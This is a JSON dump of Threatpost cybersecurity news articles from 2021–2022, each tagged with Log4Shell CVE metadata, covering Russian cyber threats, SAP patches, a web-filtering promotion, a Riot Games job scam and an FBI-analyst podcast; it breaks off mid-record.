{"threatpost": [{"lastseen": "2022-03-22T16:34:37", "description": "The Russian government is exploring \u201coptions for potential cyberattacks\u201d on critical infrastructure in the U.S., the White House warned on Monday, in retaliation for sanctions and other punishments as the war in Ukraine grinds on.\n\nOfficials said that its latest intelligence shows cyber-related \u201cpreparatory activity\u201d on the part of President Vladimir Putin\u2019s government, though White House deputy national security adviser for cyber and emerging technology Anne Neuberger emphasized that no concrete threat has been identified.\n\n\u201cTo be clear, there is no certainty there will be a cyber-incident on critical infrastructure,\u201d she told reporters [during a briefing](<https://thehill.com/homenews/administration/599072-white-house-warns-russia-prepping-possible-cyberattacks-on-us?rl=1>). She added, \u201cThere is no evidence of any specific cyberattack that we are anticipating. There is some preparatory activity that we\u2019re seeing and that is what we shared in a classified context with companies who we thought might be affected.\u201d\n\nThat observed prep work includes vulnerability scanning and website probing, she added, declining to add any specifics. She noted that officials were holding more detailed classified briefings with organizations they believe could be targeted.\n\n\u201cThe current conflict has put cybersecurity initiatives in hyperdrive, and today, industry leaders aren\u2019t just concerned about adversaries breaching critical infrastructure but losing access and control to them,\u201d Saket Modi, co-founder and CEO at Safe Security, said via email.\n\nIn tandem with the briefing, the White House released a cyber-preparedness fact sheet, and President Joe Biden [issued the following statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/>):\n\n_\u201cI have previously warned about the potential that Russia could conduct malicious cyber activity against the United States, including as a response to the unprecedented economic costs we\u2019ve imposed on Russia alongside our allies and partners. It\u2019s part of Russia\u2019s playbook. Today, my Administration is reiterating those warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.\u201d_\n\nThe [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/fact-sheet-act-now-to-protect-against-potential-cyberattacks/>) contains basic advice for hardening cyber-defenses, including employee awareness education; implementing multifactor authentication; keeping patching up-to-date; ensuring backups for data; turning on encryption; red-team exercises; and updating security tools.\n\n\u201cThis is a call to action and a call to responsibility for all of us,\u201d Neuberger said, again citing a \u201cpotential shift in intention\u201d by Russia.\n\n## **Organizations Are Not Prepared for Russian Attacks**\n\nJason Rebholz, CISO at Corvus Insurance, noted that basic cyber-hardening should have begun long ago.\n\n\u201cThe White House\u2019s best practices echo security fundamentals \u2013 something every organization should strive for,\u201d he said via email. \u201cFor many organizations, the time to implement was several years ago, as the frequency and severity of attacks began to escalate. Like planting a tree, the best time to secure your organization was ten years ago. The next best time is today. Organizations that have not addressed the key items and hardened their cyber-defenses are at a significantly greater risk of compromise.\u201d\n\nBeyond the basics, there are other challenges in being prepared for an onslaught from Russia\u2019s [considerable cyber-arsenal](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>), Modi said.\n\n\u201cWhile governments and businesses have started pivoting towards proactive cybersecurity, it is difficult to do so without addressing the three major challenges in cybersecurity that organizations face,\u201d he explained. \u201cThere are too many cybersecurity products that do not communicate with each other, and this siloed approach leads to managing cybersecurity reactively. Finally, despite increased attention on the need for a better disclosure mechanism of cyberattacks, cybersecurity communication continues to be a challenge since it often lacks a business context.\u201d\n\nMeanwhile, Danny Lopez, CEO at Glasswall, pointed out that the real risk involves zero-day exploits and other unknown threats.\n\n\u201cPutin is playing a long game. War is costly both in terms of human and economic terms. If we see a de-escalation of the situation on the ground, we are likely to see an escalation of cyber warfare,\u201d he told Threatpost. \u201cThere are no patches for [unknown zero-day] and they wreak havoc within hours, whilst the security services and technology industry tries to catch up. These are extremely dangerous to governments as well as businesses.\u201d\n\nThe bottom line is that organizations should assume that attacks are imminent, researchers concluded.\n\n\u201cIt is a confusing time that involves two nations that have historically possessed and demonstrated very good skills in the cybersecurity and cybercrime areas,\u201d noted Purandar Das, co-founder and CEO at Sotero, via email. \u201cCountries under duress have and will utilize cyberattacks as a way to retaliate and to get around sanctions. The U.S. being the face of such sanctions and a history of poorly protected infrastructure make it a tempting target. Add all this together and the warnings make a lot of sense.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:31:18", "type": "threatpost", "title": "Russia Lays Groundwork for Cyberattacks on U.S. Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T16:31:18", "id": "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "href": "https://threatpost.com/russia-cyberattacks-us-infrastructure/179037/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T20:20:39", "description": "SAP has identified 32 apps that are affected by [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 the critical vulnerability in the Apache Log4j Java-based logging library that\u2019s been [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) since last week.\n\nAs of yesterday, Patch Tuesday, the German software maker reported that it\u2019s already patched 20 of those apps, and it\u2019s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in [this document](<https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf>), accessible to users on the company\u2019s support portal.\n\nThe news about Log4Shell has been nonstop, with the easily exploited, ubiquitous vulnerability spinning off even [more dangerous variations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), being associated with yet another [vulnerability in Apache\u2019s fast-baked patch](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) and threat actors jumping it on a [global scale](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>).\n\nBetween Sunday and Wednesday morning ET, SAP had released 50 SAP Notes and Knowledge Base entries focusing on Log4j.\n\n## **Beyond \u2018Logapalooza\u2019: Other SAP Patch Tuesday Fixes**\n\nBut hard though it may be to believe, there are other SAP security matters to attend to besidea Logapalooza, including fixes for other severe flaws in the company\u2019s products. On Tuesday, [SAP released](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021>) \u200b\u200b21 new and updated security patches, including four HotNews Notes and six High Priority Notes.\n\n\u201cHotNews\u201d is the highest-severity rating that SAP doles out. Three of December\u2019s HotNews-rated bugs carried a CVSS rating of 9.9 (out of 10) and the fourth hit the top mark of 10.\n\nThomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, said in his SAP Patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-december-2021-patch-day-shadow-log4j>) that the number of HotNews Notes may seem high, but one of them \u2013 [#3089831](<https://launchpad.support.sap.com/#/notes/3089831>), tagged with a CVSS score of 9.9 \u2013 was initially released on SAP\u2019s September 2021 Patch Tuesday. Covering an SQL-injection vulnerability in SAP NZDT Mapping Table Framework, the note was updated in the December Patch Tuesday batch with what Fritsch said was information about possible symptoms. \u201cSAP explicitly says that the update does not require any customer action,\u201d he noted.\n\nAnother of the HotNews Notes \u2013 [#2622660](<https://launchpad.support.sap.com/#/notes/2622660>) \u2013 is rated a top criticality of 10, but it\u2019s the continuously recurring HotNews Note that provides an SAP Business Client Patch with the latest tested Chromium fixes.\n\n\u201cSAP Business Client customers already know that updates of this note always contain important fixes that must be addressed,\u201d Fritsch said. \u201cThe note references 62 Chromium fixes with a maximum CVSS score of 9.6 \u2014 26 of them rated with High Priority. The last number only reflects vulnerabilities that were reported externally, as Google doesn\u2019t provide such information about internally detected issues.\u201d\n\nTaking these out, what\u2019s left of the most critical non-Log4Shell patches are a duo for SAP Commerce that were both released with a CVSS criticality of 9.9, and which are detailed below.\n\n### SAP HotNews Note Security Note [#3109577](<https://launchpad.support.sap.com/#/notes/3109577>)\n\nThis note is for a code-execution vulnerability in SAP Commerce, localization for China, that covers 11 related CVEs. SAP has tagged it with a CVSS score of 9.9. The note patches multiple code-execution vulnerabilities in the product. Fritsch noted that the localization for China package uses the open-source library [XStream](<https://x-stream.github.io/>): a simple library that serializes objects to XML and back again.\n\nSAP\u2019s note provides a patch for version 2001 of the localization for China package, meaning that SAP Commerce customers using a lower version need to upgrade before applying the patch, Fritsch said. He pulled out two things worth mentioning when comparing the note\u2019s CVEs with the patches listed on <https://x-stream.github.io/security.html>:\n\n * The provided SAP patch contains version 1.4.15 of the XStream library\n * Version 1.4.15 specifically patches Code Execution vulnerabilities, but following the Xstream patch history, it also fixes two Denial-of-Service vulnerabilities and a Server-Site Forgery Request vulnerability\n\n\u201cAs a workaround, affected customers can also directly replace the affected XStream library file with its latest version,\u201d Fritsch advised.\n\n### SAP HotNews Note Security Note [#3119365](<https://launchpad.support.sap.com/#/notes/3119365>)\n\nThis one, which is also tagged with a CVSS score of 9.9, patches a code injection issue in a text extraction report of the Translation Tools of SAP ABAP Server & ABAP Platform.\n\nFound in Versions 701, 740, 750, 751, 752, 753, 754, 755, 756 and 804, the vulnerability allows an attacker with low privileges to execute arbitrary commands in the background, Fritsch explained. The fact that such an attacker would need at least a few privileges to exploit the vulnerability bumped its CVSS score down from 10, he said.\n\n\u201cThe provided patch just deactivates the affected coding,\u201d Fritsch continued. \u201cThe report is only used by SAP internally, was not intended for release, and does not impact existing functionality.\u201d\n\nThose who can access the note and who are interested in which report is affected can get that information in the \u201cCorrection Instructions\u201d section by activating the tab \u201cTADIR Entries,\u201d Fritsch said.\n\n## Notable SAP High Priority Notes\n\n### SAP Security Notes [#3114134](<https://launchpad.support.sap.com/#/notes/3114134>) and [#3113593](<https://launchpad.support.sap.com/#/notes/3113593>)\n\nSAP Commerce is also affected by these two notable High Priority notes.\n\nTagged with a CVSS score of 8.8, the first high-priority note addresses SAP Commerce installations configured to use an Oracle database, according to Fritsch. \u201cThe escaping of values passed to a parameterized \u201cin\u201d clause, in flexible search queries with more than 1000 values, is processed incorrectly,\u201d he explained. \u201cThis allows an attacker to execute crafted database queries through the injection of malicious SQL commands, thus exposing the backend database.\u201d\n\nSAP Commerce customers using the B2C Accelerator are also affected by SAP Security Note #3113593, tagged with a CVSS score of 7.5. The flaw can allow an attacker with direct write access to product-related metadata in B2C Accelerator to exploit a vulnerability in the jsoup library responsible for metadata sanitization before it\u2019s processed, Fritsch said, allowing the attacker to inflict long response delays and service interruptions that result in denial of service (DoS).\n\n### SAP Knowledge Warehouse High Priority Note [#3102769](<https://launchpad.support.sap.com/#/notes/3102769>)\n\nAnother high-priority note, in SAP Knowledge Warehouse (SAP KW), is #3102769, tagged with a CVSS score of 8.8. The note patches a cross-site scripting (XSS) vulnerability that can result in sensitive data being disclosed.\n\n\u201cThe vulnerability affects the displaying component of SAP KW and SAP explicitly points out that the pure existence of that component in the customer\u2019s landscape is all that is needed to be vulnerable,\u201d Fritsch cautioned.\n\nCustomers who don\u2019t actively use the displaying component of SAP KW may still experience a security breach, he noted.\n\nThe note details two possible workarounds:\n\n * Disabling the affected display component by adding a filter with a specific custom rule\n * Adding a rewrite rule to SAP Web Dispatcher to prevent redirects (this is only applicable if requests are routed via SAP Web Dispatcher)\n\n### SAP NetWeaver AS ABAP High Priority Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>)\n\nWith a CVSS score of 8.4, SAP Security Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>) describes a code injection vulnerability in two methods of a utility class in SAP NetWeaver AS ABAP.\n\n\u201cA highly privileged user with permissions to use transaction SE24 or SE80 and execute development objects is able to call these methods and provide malicious parameter values that can lead to the execution of arbitrary commands on the operating system,\u201d Fritsch elucidated.\n\nSAP fixed the problem by integrating the affected methods directly into the class without the possibility of passing parameters to those methods. Fritsch said that the affected classes and methods are available in the \u201cCorrection Instructions\u201d section by selecting the tab \u201cTADIR Entries.\u201d\n\n### SAF-T Framework SAP High Priority Security Note [#3124094](<https://launchpad.support.sap.com/#/notes/3124094>)\n\nThis one, which patches a directory-traversal vulnerability in the SAF-T framework, is tagged with a CVSS score of 7.7. It addresses an issue with the SAF-T framework, which is used to convert SAP tax data into the Standard Audit File Tax format (SAF-T) \u2013 an OECD international standard for the electronic exchange of data that enables tax authorities of all countries to accept data for tax purposes \u2013 and back.\n\nThe note describes how an insufficient validation of path information in the framework allows an attacker to read the complete file-system structure, Fritsch explained.\n\n## Open-Source Libraries as the Weakest Link\n\nFritsch pointed to the Log4j vulnerability and the vulnerabilities described in SAP Security Notes #3109577 and #3113593 as demonstrating \u201cthat there is always a risk involved when using open-source libraries.\u201d\n\nBesides the Log4Shell elephant in the room, recent examples that prove his point about the risks entailed by relying on the security of outside code include, for example, the recent discovery of three [malicious packages hosted](<https://threatpost.com/malicious-pypi-code-packages/176971/>) in the Python Package Index (PyPI) code repository that collectively have more than 12,000 downloads: downloads that potentially translate into loads of poisoned applications.\n\nAnother of many examples of how the software supply chain has become an increasingly popular method of distributing malware cropped up last week, when a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>)\n\nExternal libraries are convenient, but are they worth the risk? You have to do the math to figure that out, Fritsch summed up: \u201cThe ability to implement new features in a short period of time is bought at the price of dependence on the security of the external libraries. Remember, a software product is only as secure as its weakest software component.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:31:30", "type": "threatpost", "title": "SAP Kicks Log4Shell Vulnerability Out of 20 Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T19:31:30", "id": "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "href": "https://threatpost.com/sap-log4shell-vulnerability-apps/177069/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T20:40:21", "description": "The demand for public Wi-Fi is increasing constantly due to the increase of smartphone owners and remote workers. Researchers at VPNMentor say that there are approximately 549 million Wi-Fi hotspots worldwide. Another survey by Semantic found that 87 percent of U.S. consumers have used the readily available public internet at a cafe, airport or hotel.\n\nConnecting to those hotspots is usually free of charge, but there is a risk of expensive losses. According to PwC, consumers expect companies to protect their data proactively; 92 percent of consumers say companies must be proactive about data protection, 82 percent agree that the government should regulate how companies use private data, and 72 percent think that businesses, not the government, are best equipped to protect them.\n\nWhile it is impossible to guarantee 100 percent protection on public Wi-Fi, there are certain measures that can be taken to significantly reduce the risk of cyberthreats over the network and most countries started forcing Wi-Fi providers to include cybersecurity protection along with the internet in order to make them comply with the law. Compliances differ from country to country. We have CIPA in the USA, IWF & Friendly Wi-Fi in the UK, and BpjM in Germany, but all of them tend to require the same thing, that is, filter inappropriate content and keep the user protected.\n\nWeb filtering is considered to be an all-in-one package solution that protects users from cyber-threats while filtering the internet from unwanted content. However, not all web filtering providers offer additional features.\n\nThere certainly are a few good players on the market, where SafeDNS is among the top ones according to Capterra. \nimage.png\n\n## SafeDNS for Wi-Fi Providers\n\nSafeDNS has a Resellers program for MSPs and Wi-Fi providers. The program is sold at a competitive price with volume-based and multi-year subscription discounts, a user-friendly admin panel to create and modify customers\u2019 accounts, 24/7 support that would be more than happy to assist you with the related issues.\n\nSafeDNS cloud service for web content filtering can be deployed on a public Wi-Fi network in minutes. The service is managed 24/7 from anywhere on the internet via a centralized online dashboard. It allows you to deploy an individual filtering policy for every location you have. You can fine-tune the policies and change them for specific locations at any minute.\n\n## Benefits of SafeDNS\n\n * A volume-based discount for Wi-Fi providers, up to 40 percent.\n * Central admin panel to control and modify client\u2019s accounts.\n * White-label for Wi-Fi providers to promote their own brand (logo & domain).\n * Easy deployment and management that doesn\u2019t require any hardware.\n * API with full guides.\n * 24/7 friendly support (calls, email, live chat).\n * 14-day trial for each potential client you have.\n * Discount for friendly Wi-Fi certification.\n\n## Features of SafeDNS\n\n * Adblocking that blocks recurrent ads on your guests\u2019 screens that sometimes mask malware.\n * Enhanced protection against child sexual abuse.\n * Advanced threat intelligence against malicious content and phishing recourses.\n * Pre-defined categories; each can be blocked with a single click.\n * Granular block/allow lists, and \u201callow list only\u201d feature.\n * Anycast servers with low latency.\n * Agent roaming client.\n * Unlimited filtering policies per subscription.\n * User-friendly dashboard.\n * Public Wi-Fi usage policy compliance.\n * Monitoring and reporting system for marketing analytics and employee management.\n * Scheduled filter for different kinds of filtering on the day times.\n * Multi tenants per subscription.\n\nYou can register for the reseller plan using [this link](<https://www.safedns.com/trial/reseller/?utm_source=threatpost&utm_medium=article&utm_campaign=wifi_prov&utm_content=reseller_trial>), no deposit is necessary. You can test the service for up to 14 days and only start paying when you get the payment from your first client who uses our service.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T16:06:19", "type": "threatpost", "title": "Web Filtering & Compliances for Wi-Fi Providers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T16:06:19", "id": "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "href": "https://threatpost.com/web-filtering-and-compliances-for-wi-fi-providers/178532/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. \u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019 **\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to illicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the co-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": "https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T14:11:27", "description": "Crooks are crooks, right?\n\nWhatever motivates serial violent offenders doesn\u2019t switch off when they stop mugging people and instead pick up a keyboard to transform into cyber actors who craft cyber threats.\n\nAt least, that was the thinking behind the 2012 creation of the FBI\u2019s Cyber Behavioral Analysis Center (CBAC).\n\n\u201cBehavioral characteristics and motivations of cybercriminals in the real world and virtual world are the same,\u201d said Crane Hassold, who helped to create the CBAC after spending more than 11 years as an FBI analyst, offering strategic and tactical analytical support to cyber, financial crime and violent crime cases. \u201cThe only thing that differentiates them is their choice to use a computer to facilitate a crime.\u201d\n\nDuring his stint at the FBI, Hassold researched a slew of cyber threat flavors: malware, network intrusions, denial-of-service attacks, botnets, phishing and hacktivism. He also served as a subject matter expert who trained others on collecting and analyzing open-source intelligence (OSINT) to identify investigative leads and adversary attribution. As well, Hassold spent his days scouring digital evidence to identify behavioral artifacts and investigative leads and reverse-engineering malicious code to better understand adversary motivations and tactics.\n\nNow, he\u2019s director of threat intelligence at cloud-native email security platform Abnormal Security.\n\nAfter having honed his skills in the behavioral analysis unit, Hassold now goes undercover to connect with attackers directly, unfettered by the red tape of working at a law enforcement agency.\n\nHe\u2019s got some interesting stories: stories about looking at cyber threats at a more human level, about delving into more than the tools, techniques and procedures (TTPs) \u2013 all those technical bells and whistles of cybercrime.\n\nHassold visited the Threatpost podcast recently to share his stories about using the concepts built by the FBI to understand how criminals exploit victims\u2019 behavior in [business email compromise (BEC)](<https://threatpost.com/bec-losses-top-18b/167148/>), about engaging with BEC actors (first covertly and then overtly), and more. As well, he shared some key findings from Abnormal\u2019s recent [report](<https://abnormalsecurity.com/resources/ransomware-victims-threat-actors>) about ransomware.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/MULTITRACK_MIXDOWN_020822_Crane_Hassold_Abnormal_Security.mp3>). For more podcasts, check out[ Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_ \n\n\n(Brought to you by [Specops Technology](<http://www.specopssoft.com/threatpost>). _Underwriters of Threatpost podcasts do not assert any editorial control over content._)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T14:00:57", "type": "threatpost", "title": "Ex-Gumshoe Nabs Cybercrooks with FBI Tactics", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 